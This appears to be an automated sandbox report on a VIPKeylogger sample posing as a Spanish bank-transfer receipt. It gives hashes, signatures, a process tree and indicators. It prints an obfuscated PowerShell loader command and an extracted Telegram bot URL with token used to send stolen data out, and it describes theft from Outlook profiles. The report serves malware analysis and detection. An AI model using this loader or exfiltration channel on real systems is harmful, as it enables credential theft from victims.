Analysis
-
max time kernel
104s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
14/04/2025, 15:52
Static task
static1
Behavioral task
behavioral1
Sample
justificante de transferencia - 7889893409.exe
Resource
win10v2004-20250410-en
Behavioral task
behavioral2
Sample
Lsebgers.ps1
Resource
win10v2004-20250410-en
General
-
Target
justificante de transferencia - 7889893409.exe
-
Size
1020KB
-
MD5
4060ccad239038c4a6485563f6a28287
-
SHA1
3a4d8088e1db32320dfaab3e0d11f053772973a0
-
SHA256
60814232e8b491aa42c4d37ec185c738319beb104f65ee579f017a4750c04eea
-
SHA512
30ef737394caa7ee10c3226d0f908c9054480845a45199103f7afe0abb6efc31877cc56b4e783d86393832a6051c135bff0f195b6c8bf3ea68e10e7f49c6c4ef
-
SSDEEP
24576:ghXzjD/sw7fNgh3VANkbtfu/MK+sqVj50LLoborPpIgaQQhN+A:gpzjD/swfNgn6V+h70A0CZL
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7503700665:AAGL8MMCdDcG7tz-eC9bATTNxcDJaBzKQqA/sendMessage?chat_id=7618581100
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 14 460 msiexec.exe 16 460 msiexec.exe 18 460 msiexec.exe 21 460 msiexec.exe 24 460 msiexec.exe 36 460 msiexec.exe 40 460 msiexec.exe 44 460 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 drive.google.com 14 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 checkip.dyndns.org 39 reallyfreegeoip.org 40 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 460 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3548 powershell.exe 460 msiexec.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Jobname.ini justificante de transferencia - 7889893409.exe File opened for modification C:\Program Files (x86)\Common Files\forums\dugs.ini justificante de transferencia - 7889893409.exe -
pid Process 3548 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language justificante de transferencia - 7889893409.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 460 msiexec.exe 460 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3548 powershell.exe Token: SeIncreaseQuotaPrivilege 3548 powershell.exe Token: SeSecurityPrivilege 3548 powershell.exe Token: SeTakeOwnershipPrivilege 3548 powershell.exe Token: SeLoadDriverPrivilege 3548 powershell.exe Token: SeSystemProfilePrivilege 3548 powershell.exe Token: SeSystemtimePrivilege 3548 powershell.exe Token: SeProfSingleProcessPrivilege 3548 powershell.exe Token: SeIncBasePriorityPrivilege 3548 powershell.exe Token: SeCreatePagefilePrivilege 3548 powershell.exe Token: SeBackupPrivilege 3548 powershell.exe Token: SeRestorePrivilege 3548 powershell.exe Token: SeShutdownPrivilege 3548 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeSystemEnvironmentPrivilege 3548 powershell.exe Token: SeRemoteShutdownPrivilege 3548 powershell.exe Token: SeUndockPrivilege 3548 powershell.exe Token: SeManageVolumePrivilege 3548 powershell.exe Token: 33 3548 powershell.exe Token: 34 3548 powershell.exe Token: 35 3548 powershell.exe Token: 36 3548 powershell.exe Token: SeDebugPrivilege 460 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 5548 wrote to memory of 3548 5548 justificante de transferencia - 7889893409.exe 89 PID 5548 wrote to memory of 3548 5548 justificante de transferencia - 7889893409.exe 89 PID 5548 wrote to memory of 3548 5548 justificante de transferencia - 7889893409.exe 89 PID 3548 wrote to memory of 460 3548 powershell.exe 94 PID 3548 wrote to memory of 460 3548 powershell.exe 94 PID 3548 wrote to memory of 460 3548 powershell.exe 94 PID 3548 wrote to memory of 460 3548 powershell.exe 94 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\justificante de transferencia - 7889893409.exe"C:\Users\Admin\AppData\Local\Temp\justificante de transferencia - 7889893409.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle 1 "$Preexistence237=GC -raw 'C:\Users\Admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Lsebgers.Bre';$Virkningsfuld=$Preexistence237.SubString(3651,3);.$Virkningsfuld($Preexistence237)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:460
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
420KB
MD5c950acbaf828e689d22b0a2e86852464
SHA1655ff05fd4bbbc4da80330b18f77004ba61fa5cf
SHA2568dca2eb16c0e35c9ec61fbc48f44264d64c5e9a308b57e0bf7d2aad430d6913d
SHA5125051b2deda54202d3c3ec6908e0a1e9a0ed8bbf18164bf2bdb1d366a82c693e9acaba6728de0cf1f35e8922b6358a72e905b44be0981a1247b71628e803546c5
-
Filesize
54KB
MD5ca6b30d971f2b79383c80f5c12718e8f
SHA13f49b9675ce0d5df8f426436624507e5276b5a5a
SHA2564ac783e447712a8001e6abdc47c4e1b2bbc4a990a0af8c0dc60468762cfd89e0
SHA512c20c75bc3b1a8a52061072bbc2e7e0dc60980e04d7a78e96fd2552a1a56f023ae84675dd3599245a539a2219c262310d73c4e43530b7a1b7e8b46ceb49aa2707